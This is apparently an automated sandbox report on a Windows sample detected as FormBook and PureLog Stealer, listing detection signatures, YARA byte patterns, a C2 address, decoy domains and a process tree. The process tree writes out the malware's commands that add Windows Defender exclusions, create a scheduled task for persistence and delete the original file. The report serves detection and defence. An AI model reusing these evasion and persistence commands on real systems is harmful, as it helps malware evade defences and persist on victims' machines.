Edit tour

Windows Analysis Report
order-payment094093.exe

Overview

General Information

Sample name:	order-payment094093.exe
Analysis ID:	1437996
MD5:	91592318966139c15e0171f341882fc8
SHA1:	a6689f85a42ce934c3e96a9088f67c48e2e1fe83
SHA256:	2ece30c08f63f4fdc4d7326b39aa0066938163811e35d1aef6ddd2e0fada475f
Tags:	exe
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Early bird code injection technique detected

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

order-payment094093.exe (PID: 1136 cmdline: "C:\Users\user\Desktop\order-payment094093.exe" MD5: 91592318966139C15E0171F341882FC8)

powershell.exe (PID: 2020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NFOLsr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5064 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 3320 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

order-payment094093.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\order-payment094093.exe" MD5: 91592318966139C15E0171F341882FC8)

explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 1612 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)

cmd.exe (PID: 1832 cmdline: /c del "C:\Users\user\Desktop\order-payment094093.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 3136 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

NFOLsr.exe (PID: 4996 cmdline: C:\Users\user\AppData\Roaming\NFOLsr.exe MD5: 91592318966139C15E0171F341882FC8)

schtasks.exe (PID: 2536 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpF3AA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

NFOLsr.exe (PID: 2728 cmdline: "C:\Users\user\AppData\Roaming\NFOLsr.exe" MD5: 91592318966139C15E0171F341882FC8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.vagabondtracks.com/hd05/"], "decoy": ["businessjp6-51399.info", "countyyoungpest.com", "taxilasamericas.com", "stairs.parts", "nrgsolutions.us", "cbdgirl.guru", "dropshunter.net", "adorabubble.co.za", "alcohomeexteriors.com", "aquariusbusiness.info", "zaginione.com", "pintoresmajadahonda.com", "fursace.club", "musiletras.co", "carpoboutiquehotel.com", "redacted.investments", "symplywell.me", "lezxop.xyz", "stmbbill.com", "1509068.cc", "savdesign.online", "gaiacoreresearch.com", "pivoluvva-usa.com", "kathrynmirabella.com", "ziplnk.xyz", "furanoikedanouen.com", "regenesisvista.world", "lorenzodavissr.com", "friendlyemporium.com", "7727.info", "moledistillery.com", "geturpdtaemza.com", "sparkfirestarter.net", "q3hjns.shop", "thingsidonaked.com", "attack.info", "salihkaradag.com", "vn6b6q.com", "thierrydoublein.com", "buddhasiddhartha.com", "uniqueofferss.com", "trexendofparadise.club", "evans-gdaddy-test-domain.online", "kgroundx.com", "2us7o.us", "damtherncooling.com", "kakashi-hatake.shop", "blogonrunning.com", "lovepox.com", "ramediatech.online", "satwaspin.net", "greenink.store", "tuskerlogix.com", "codyscalls.com", "system.ngo", "connect-talent.com", "addck.top", "teramilab.com", "yuyuklmn123888yy.xyz", "9orwr6.vip", "nubeqa77.life", "lmpalmour.com", "sandeshkrantinews.in", "find-buildings.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.3333395951.0000000011211000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xa72:$a2: pass 0xa78:$a3: email 0xa7f:$a4: login 0xa86:$a5: signin 0xa97:$a6: persistent 0xc6a:$r1: C:\Users\user\AppData\Roaming\0PLABCA3\0PLlog.ini
00000000.00000002.2141897621.0000000009770000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b73d1:$a1: 3C 30 50 4F 53 54 74 09 40 0x2e57f1:$a1: 3C 30 50 4F 53 54 74 09 40 0x312c11:$a1: 3C 30 50 4F 53 54 74 09 40 0x2cdd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2fc160:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x329580:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2bbb4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x2e9f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x31738f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x2c6a37:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x2f4e57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x322277:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2baa88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2bad02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2e8ea8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2e9122:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3162c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x316542:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2c6835:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2f4c55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x322075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2c6321:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2f4741:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x321b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2c6937:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2f4d57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x322177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2c6aaf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2f4ecf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x3222ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2bb71a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2e9b3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x316f5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x2c99c9:$sqlite3step: 68 34 1C 7B E1 0x2c9adc:$sqlite3step: 68 34 1C 7B E1 0x2f7de9:$sqlite3step: 68 34 1C 7B E1 0x2f7efc:$sqlite3step: 68 34 1C 7B E1 0x325209:$sqlite3step: 68 34 1C 7B E1 0x32531c:$sqlite3step: 68 34 1C 7B E1 0x2c99f8:$sqlite3text: 68 38 2A 90 C5 0x2c9b1d:$sqlite3text: 68 38 2A 90 C5 0x2f7e18:$sqlite3text: 68 38 2A 90 C5 0x2f7f3d:$sqlite3text: 68 38 2A 90 C5 0x325238:$sqlite3text: 68 38 2A 90 C5 0x32535d:$sqlite3text: 68 38 2A 90 C5 0x2c9a0b:$sqlite3blob: 68 53 D8 7F 8C 0x2c9b33:$sqlite3blob: 68 53 D8 7F 8C 0x2f7e2b:$sqlite3blob: 68 53 D8 7F 8C 0x2f7f53:$sqlite3blob: 68 53 D8 7F 8C 0x32524b:$sqlite3blob: 68 53 D8 7F 8C 0x325373:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2122231428.0000000002EBA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x87251:$a1: 3C 30 50 4F 53 54 74 09 40 0x9dbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x8b9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x968b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8a908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8ab82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x966b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x961a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x967b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x9692f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8b59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x9541c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8c293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x9c927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x9d92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x99849:$sqlite3step: 68 34 1C 7B E1 0x9995c:$sqlite3step: 68 34 1C 7B E1 0x99878:$sqlite3text: 68 38 2A 90 C5 0x9999d:$sqlite3text: 68 38 2A 90 C5 0x9988b:$sqlite3blob: 68 53 D8 7F 8C 0x999b3:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.2246034694.000000000331A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: order-payment094093.exe PID: 1136	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: order-payment094093.exe PID: 1136	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x81899:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: order-payment094093.exe PID: 5016	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x14e:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 4004	ironshell_php	Semi-Auto-generated - file ironshell.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xbef5f:$s2: ~ Shell I 0x1116ec:$s2: ~ Shell I 0x240f61:$s2: ~ Shell I
Process Memory Space: NFOLsr.exe PID: 4996	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: explorer.exe PID: 1612	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2504:$a1: 3C 30 50 4F 53 54 74 09 40 0x121a44:$a1: 3C 30 50 4F 53 54 74 09 40 0x1286e0:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: netsh.exe PID: 3136	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x97a23:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 41 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.order-payment094093.exe.9770000.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.order-payment094093.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.order-payment094093.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
